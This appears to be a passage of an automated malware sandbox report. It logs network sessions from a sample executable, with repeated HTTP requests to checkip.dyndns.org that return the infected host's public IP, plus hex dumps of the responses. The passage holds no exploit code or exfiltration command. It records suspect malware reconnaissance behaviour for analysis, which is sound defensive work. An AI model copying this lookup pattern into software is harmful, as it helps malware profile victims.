                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                          Jan 11, 2025 03:06:10.371051073 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 03:06:11.709779024 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.1049729132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:12.603893995 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:15.106184959 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.1049731132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:15.976789951 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:17.024198055 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:16 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.1049733132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:17.844587088 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:18.657212019 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.1049735132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:19.547066927 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:20.372675896 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:20 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.1049737132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:21.545291901 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:22.353651047 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:22 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.1049739132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:23.249130964 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:24.109461069 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:23 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.1049741132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:24.921981096 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:25.734456062 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:25 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.1049743132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:26.642739058 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:27.470195055 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:27 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.1049745132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:28.288182974 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:29.113658905 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.1049747132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:30.117631912 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:30.949954987 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:30 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.1049749132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:31.761440039 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:32.586575031 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:32 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.1049751132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:33.444525957 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:34.289345026 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.1049753132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:35.162589073 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:36.037976027 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:35 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.1049755132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:36.893040895 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:38.221594095 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:38 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.1049757132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:39.043637991 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:39.882061958 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:39 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.1049759132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:40.771517038 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:41.594609976 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:41 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.1049761132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:42.434350014 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:43.279299021 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:43 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.1049763132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:44.526838064 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:45.845668077 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:06:45 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.1049765132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
